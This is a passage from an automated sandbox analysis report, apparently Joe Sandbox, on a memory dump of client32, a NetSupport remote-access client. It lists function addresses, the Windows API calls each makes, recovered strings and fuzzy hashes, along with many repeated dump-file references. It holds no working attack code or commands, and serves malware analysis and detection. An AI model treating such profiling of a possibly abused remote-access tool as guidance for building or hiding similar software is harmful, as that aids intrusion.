Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

nColors, xrefs: 110EFB55
..\CTL32\pcibmp.cpp, xrefs: 110EFB50

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
String ID: ..\CTL32\pcibmp.cpp$nColors
API String ID: 2713834284-4292231205
Opcode ID: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
Instruction ID: cfed96a02f924fb25650393b30a092bd0643f011e0ddcc2ee79cac053fdacdf4
Opcode Fuzzy Hash: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
Instruction Fuzzy Hash: 4AE04F23F4123937EA11659AAC46FCAF79C9B867A8F0201B2FA04FB392E5D16C0446D5

Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

_free.LIBCMT ref: 1103D221

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970

SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
MessageBeep.USER32(00000000), ref: 1103D25E

Strings

Show has overrun too much, aborting, xrefs: 1103D1F1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
String ID: Show has overrun too much, aborting
API String ID: 304545663-4092325870
Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2

Function 11135840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

CreateThread.KERNEL32(00000000,00001000,11135700,00000000,00000000,1114239E), ref: 11135874
CloseHandle.KERNEL32(00000000,?,?,1114239E,?,?,?,00000000,?), ref: 1113587B

Strings

UnresponsiveTime, xrefs: 1113584E
_debug, xrefs: 11135853

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: UnresponsiveTime$_debug
API String ID: 3257255551-835906747
Opcode ID: cc8639b16c25cac1e52894210ac58e7b2359e4dff3c35d598e5f7e41013e41f7
Instruction ID: da03a37385785a02b027e482226a98526a2e13ea63ea6826a5b8101025715082
Opcode Fuzzy Hash: cc8639b16c25cac1e52894210ac58e7b2359e4dff3c35d598e5f7e41013e41f7
Instruction Fuzzy Hash: B2E0C239784318BBF66887E29E4AFB5FB1CE704B56F500158FB19A64C8DA917800C76A

Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D3EB
EnableWindow.USER32(00000000,?), ref: 1101D3F6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D3D1
m_hWnd, xrefs: 1101D3D6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4

Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 11027561
EnumWindows.USER32(11027450,00000000), ref: 1102756A
ExitThread.KERNEL32 ref: 11027577

Strings

TapiFix, xrefs: 11027536

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumExitSleepThreadWindows
String ID: TapiFix
API String ID: 1804117399-2824097521
Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9

Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D43F
ShowWindow.USER32(00000000), ref: 1101D446

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D421
m_hWnd, xrefs: 1101D426

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1319256379-1986719024
Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0

Function 1100BB30 Relevance: 6.2, APIs: 4, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1100BBF0
__CxxThrowException@8.LIBCMT ref: 1100BC05
std::exception::exception.LIBCMT ref: 1100BC14
__CxxThrowException@8.LIBCMT ref: 1100BC29

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
String ID:
API String ID: 1651403513-0
Opcode ID: 5a39e07fdd5d063ecfd236749048a4849a562522a8cbc41e7e6143ded7e71120
Instruction ID: 24df0323ce75f1771b5e486737171493ff854af14d8bb6c891eae8217b7a1c7e
Opcode Fuzzy Hash: 5a39e07fdd5d063ecfd236749048a4849a562522a8cbc41e7e6143ded7e71120
Instruction Fuzzy Hash: 28711BB9A05B09DFD715CF68C980A9AFBF4FB48714F10866EE86A97740D730A904CB91

Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 111656DE
__flush.LIBCMT ref: 111656FC
__write.LIBCMT ref: 11165723
__flsbuf.LIBCMT ref: 1116574E

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40

Function 11067900 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON

Download Yara Rule

APIs

MessageBeep.USER32(00000000), ref: 1106791B
MessageBeep.USER32(00000000), ref: 11067957
MessageBeep.USER32(00000000), ref: 110679AA
MessageBeep.USER32(00000000), ref: 110679EB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: BeepMessage
String ID:
API String ID: 2359647504-0
Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1

Function 11125BF0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 11125CF9
GlobalDeleteAtom.KERNEL32 ref: 11125D07
CloseHandle.KERNEL32(?), ref: 11125D18
DeleteCriticalSection.KERNEL32(?), ref: 11125D22

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Delete$AtomCloseCriticalGlobalHandleObjectSection
String ID:
API String ID: 2137257056-0
Opcode ID: d436c9e4e66fc11a34308c1fb2fde0a72767b856c2a2368ce2f197238bab7535
Instruction ID: ea5c022f273f1ff7de514f61b80fa7d88f2221346ed8171ef8a24d86060857d9
Opcode Fuzzy Hash: d436c9e4e66fc11a34308c1fb2fde0a72767b856c2a2368ce2f197238bab7535
Instruction Fuzzy Hash: F731CEB57007069BE714DB65DAC4ABBF7ADAF84708F54052CE91B87240EB35F810CB51

Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731

_malloc.LIBCMT ref: 110491DD
_memmove.LIBCMT ref: 110491EA
SendMessageTimeoutA.USER32(?,0000004A,00000000,?,00000002,00001388,?), ref: 11049224
_free.LIBCMT ref: 1104922B

Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
String ID:
API String ID: 176360892-0
Opcode ID: 0617cbae31ea72545f3b1c4800d88ad779fbc298066b54dd93363df8728086e8
Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
Opcode Fuzzy Hash: 0617cbae31ea72545f3b1c4800d88ad779fbc298066b54dd93363df8728086e8
Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1

Function 110297F0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: SleepThread$CreateMessagePost
